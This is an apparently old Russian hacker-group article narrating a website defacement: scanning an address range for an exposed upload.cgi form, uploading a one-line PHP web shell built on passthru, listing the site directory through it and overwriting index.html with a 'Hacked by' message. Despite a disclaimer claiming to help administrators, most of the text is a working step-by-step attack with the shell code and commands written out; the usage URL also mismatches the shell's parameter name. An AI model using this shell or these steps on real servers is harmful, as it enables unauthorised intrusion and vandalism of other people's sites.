Дефейс на уровне карапуза

     Сегодня  я  расскажу о взломе, точнее только о дефейсе, который сможет повторить, в принципе, любой человек
     немного  знакомый  с сетью. Однако не смотря на простоту взлом остаётся взломом и эта статья никоим образом
     не  направлена  на  то чтобы толкнуть вас на повторение подобных дефейсов, этой статьёй я лишь хочу немного
     помочь админам и указать на их ошибки.
     Поехали...  Дело  было  вечером, делать было нечего. Решил я немного побаловаться прогой которая называется
     grinder, если коротко рассказать о назначении проги то она предназначена для сканирования диапазона адресов
     на  наличие  какого-либо файла ( например passwd.txt =)) Значит запускаю гриндера ввожу диапазон 
     216.*.18.1 - 216.*.18.254 и в качестве файла для поиска, недолго думая, ввожу /cgi-bin/upload.cgi.
     Через  некоторое  время  получаю  отчёт.  Отлично по адресу 216.*.18.10 искомый файл был найден =) Теперь в
     браузере ввожу 216.*.18.10/cgi-bin/upload.cgi и получаю форму для загрузки файлов.
     Пишу в cmd.php следующее:

     ###########################
     <? passthru("$command"); ?>
     ###########################

     Знакомая строка не правда ли?
     Воспользовавшись формой загрузки, закидываю этот файлик на сервак в каталог upload.
     Теперь у меня есть http-шелл по адресу 216.*.18.10/upload/cmd.php
     Использовать будем так: 216.*.18.10/upload/cmd.php?command=команда
     Сначала просматриваю каталог сайта: 216.*.18.10/upload/cmd.php?cmd=cd ..; ls -la
     Получаю листинг каталога и тихо офигеваю =) Я и не думал что всё будет так просто:

     [ покусано ]
     drwxrwxr-x 189 mtgnet www 4608 Feb 26 10:35 company
     drwxrwxr-x 2   mtgnet www 512  Jul 30 2002  dalemort
     drwxrwxr-x 5   mtgnet www 512  Feb 6  11:39 domain
     -rw-rw-r-- 1   mtgnet www 1149 Jul 30 2002  error.htm
     drwxrwxr-x 8   mtgnet www 512  Jul 4  1998  features
     -rw-rw-r-- 1   mtgnet www 1637 Aug 23 2001  footer.txt
     -rw-rw-r-- 1   mtgnet www 223  Feb 4  1998  header.txt
     -rw-rw-r-- 1   mtgnet www 351  Mar 15 23:42 index.html
     -rw-r--r-- 1   www    www 1837 Nov 19 18:46 loanappdata.9165
     drwxrwxr-x 5   mtgnet www 512  Mar 20 1998  marketupdate
     drwxrwxr-x 4   mtgnet www 512  Apr 22 2002  sfaq
     [ покусано ]

     Как вы видите права на index.html прекрасно разрешают нам запись в этот файл =) Чем мы и воспользуемся =)
     Делаем:
     216.*.18.10/upload/cmd.php?cmd=cd ..; echo Hacked by karapuzzzz > index.html
     и наслаждаемся дефейсом =)

     Вот такой простой дефейс. Как видите особенных знаний нам для него не потребовалось.
     А на этом всё... Удачи.

     

     Автор: 1dt.w0lf
     ---------------------------------------
     RusH security team - http://rst.void.ru